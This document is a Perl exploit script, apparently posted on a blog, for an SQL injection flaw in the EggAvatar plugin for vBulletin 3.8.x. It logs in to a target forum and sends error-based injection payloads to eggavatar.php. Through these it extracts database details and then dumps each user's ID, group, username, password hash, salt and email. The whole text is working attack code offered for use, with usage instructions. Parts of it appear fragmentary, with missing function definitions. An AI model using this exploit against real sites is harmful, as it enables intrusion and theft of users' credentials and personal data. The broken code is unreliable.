Saturday, August 6, 2011
#!/usr/bin/env perl
print "###################################\n" ; |
print "############ DSecurity ############\n" ; |
print "###################################\n" ; |
print "#[at] #\n" ; |
print "###################################\n" ; |
print "Usage: $0 address username password number_user sleeptime\n" ; |
print "Example: $0 http://localhost/vbb test test 10 10\n" ; |
$ua =LWP::UserAgent->new(); |
my $req = HTTP::Request->new(POST => $ARGV [0]. '/login.php?do=login' ); |
$req ->content_type( 'application/x-www-form-urlencoded' ); |
$req ->content( "vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf=" ); |
my $res = $ua ->request( $req ); |
if ( $from eq '' ) { $from = 'information_schema.tables' ;} |
if ( $where eq '' ) { $where = '1' ;} |
if ( $limit eq '' ) { $limit = '0' ;} |
if ( $sleep eq '' ) { $sleep = '10' ;} |
my $req = HTTP::Request->new(POST => $ARGV [0]. '/eggavatar.php' ); |
$req ->content_type( 'application/x-www-form-urlencoded' ); |
$req ->content( 'do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1' . "'
and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select from $from
WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM
information_schema.tables GROUP BY foo)a)-- -'&uid=1&pid=1" ); |
my $res = $ua ->request( $req ); |
if ( $res ->content =~ /(MySQL Error)(.*?) '(.*?)0' (.*)/) |
return $print . $test . "\n" ; |
print "\n#############################################################################################################\n" ; |
print "# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability #\n" ; |
print "# Date:06-03-2011 #\n" ; |
print "# Author: DSecurity #\n" ; |
print "# Software Link: #\n" ; |
print "# Version: 2.3.2 #\n" ; |
print "# Tested on: vBulletin 3.8.0 #\n" ; |
print "#############################################################################################################\n" ; |
login( $ARGV [1], $ARGV [2]); |
print v_request( 'MySQL version: ' , '@@version' ); |
print v_request( 'Data dir: ' , '@@datadir' ); |
print v_request( 'User: ' , 'user()' ); |
print v_request( 'Database: ' , 'database()' ); |
for ( $i =1; $i <= $ARGV [3]; $i ++){ |
print "-----------------------------------------\n" ; |
print $id = v_request( 'ID: ' , 'userid' , 'user' , '1' , $i -1); |
if ( $id =~ /(ID:)\s(.*)/){ |
print v_request( 'Group: ' , 'usergroupid' , 'user' , 'userid=' . $2 ); |
print v_request( 'Username: ' , 'username' , 'user' , 'userid=' . $2 ); |
print v_request( 'Password: ' , 'password' , 'user' , 'userid=' . $2 ); |
print v_request( 'Salt: ' , 'salt' , 'user' , 'userid=' . $2 ); |
print v_request( 'Email: ' , 'email' , 'user' , 'userid=' . $2 ); |
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